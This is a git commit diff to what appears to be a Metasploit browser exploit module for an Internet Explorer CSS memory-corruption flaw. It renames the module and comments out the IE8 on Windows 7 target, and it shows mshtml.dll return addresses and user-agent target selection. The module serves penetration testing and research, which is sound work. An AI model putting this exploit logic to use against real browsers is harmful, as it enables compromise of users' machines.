switch title, comment out IE8 target for now
git-svn-id: file:///home/svn/framework3/trunk@10963 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
9e8a567dd3
commit
61e5d00722
|
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer CSS Tags Memory Corruption',
|
||||
'Name' => 'Internet Explorer CSS SetUserClip Memory Corruption',
|
||||
'Description' => %q{
|
||||
Thie module exploits a memory corruption vulenrability within Microsoft's
|
||||
HTML engine (mshtml). When parsing an HTML page containing a specially
|
||||
|
@ -106,11 +106,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
],
|
||||
|
||||
#
|
||||
# Although IE8 is affected, we don't currently have a working target for it.
|
||||
#
|
||||
=begin
|
||||
[ 'Internet Explorer 8 on Windows 7',
|
||||
{
|
||||
'Ret' => 0x7a6902d7, # mshtml.dll 8.00.7600.16385 @ 0x68e40000
|
||||
#'Ret' => 0x396392db, # mshtml.dll 8.0.7600.16671 @ 0x62f90000
|
||||
'Ret' => 0x39696cd8, # mshtml.dll 8.0.7600.16671 @ 0x694e0000
|
||||
#'Ret' => 0x7a6902d7, # mshtml.dll 8.00.7600.16385 @ 0x68e40000
|
||||
}
|
||||
]
|
||||
=end
|
||||
],
|
||||
'DisclosureDate' => 'Nov 3 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
@ -125,8 +132,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mytarget = targets[2] # IE6 on NT, 2000, XP and 2003
|
||||
elsif agent =~ /MSIE 7\.0/
|
||||
mytarget = targets[3] # IE7 on XP and 2003
|
||||
=begin
|
||||
elsif agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 6\.1/
|
||||
mytarget = targets[4] # IE8 on Windows 7
|
||||
=end
|
||||
else
|
||||
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue